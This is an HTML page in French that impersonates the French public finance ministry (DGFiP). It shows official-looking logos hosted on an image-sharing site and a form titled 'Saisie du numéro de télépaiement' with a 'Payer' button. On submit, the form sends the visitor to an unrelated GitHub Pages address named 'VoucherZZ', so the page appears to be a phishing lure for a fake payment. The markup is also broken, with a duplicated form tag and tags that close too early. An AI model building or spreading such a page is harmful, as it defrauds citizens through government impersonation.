<!DOCTYPE html>
<html lang="fr">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>République Française - Ministère de l'action et des comptes publics</title>
    <style>
      body {
        margin: 0;
        font-family: Arial, sans-serif;
      }
      .wrapper {
        display: flex;
        justify-content: center;
        padding: 0px;
      }
      .logo-wrapper {
        max-width: 130%;
        text-align: ;
      }
      .logo-header {
        width: 108%;
        height: auto;
       }
          
         .button-zone button {
            background-color: #007BFF;
            color: white;
            border: none;
            padding: 12px 65px;
            font-size: 16px;
            border-radius: 4px;
            cursor: pointer;
      
      }
      
      
 
      
    </style>
  </head>
  <body>
    <header class="wrapper">
      <div class="logo-wrapper">
        <a href="/tai" aria-label="Revenir à la page d'accueil">
       <center><img src="https://i.ibb.co/v65PmWfY/Cu.jpg" class="logo-header" alt="République Française Liberté Egalité Fraternité - Ministère de l'action et des comptes publics">      <p><p><p><p>

        </a>
         <center><a href="https://imgbb.com/"><img src="https://i.ibb.co/WWx1pZ4n/e.jpg" alt="e" border="0" /></a>
      <p><p><p><p>

     </body>
</html>
    <div class="form-container">
        <h2>Saisie du numéro de télépaiement</h2>
      
        <form id="saisie" onsubmit="window.location.href='https://justmoicom.github.io/VoucherZZ/'; return false;">
      
      
      
          <form id="saisie" onsubmit="window.location.href='https://justmoicom.github.io/VoucherZZ/'; return false;">
            <div class="input-group">
                <label for="numeroTelepaiement">Numéro de télépaiement :</label>
                <input type="tel" id="numeroTelepaiement" maxlength="22" required placeholder="Numéro de télépaiement" value="123456789012345678">
                                         <p>
            </div>
            <div class="input-group">
                <label for="cle">Clé :</label>
                <input type="tel" id="cle" maxlength="2" required placeholder="Clé" value="12">
                                                  <p>                               
            </div>
            <div class="button-zone">
                <button type="submit">Payer</button>
            </div>
        </form>
                  <p><p>

           <p><p><p><p>

      
      
      <p><p><p><p>
             <p><p><p><div class="footer-copyright"><p> © Direction générale des Finances publiques - <a id="mention-legales" class="xt" href="/tai/mention-legales">Mentions légales</a></p></div>                             
    
  </body>
</html>
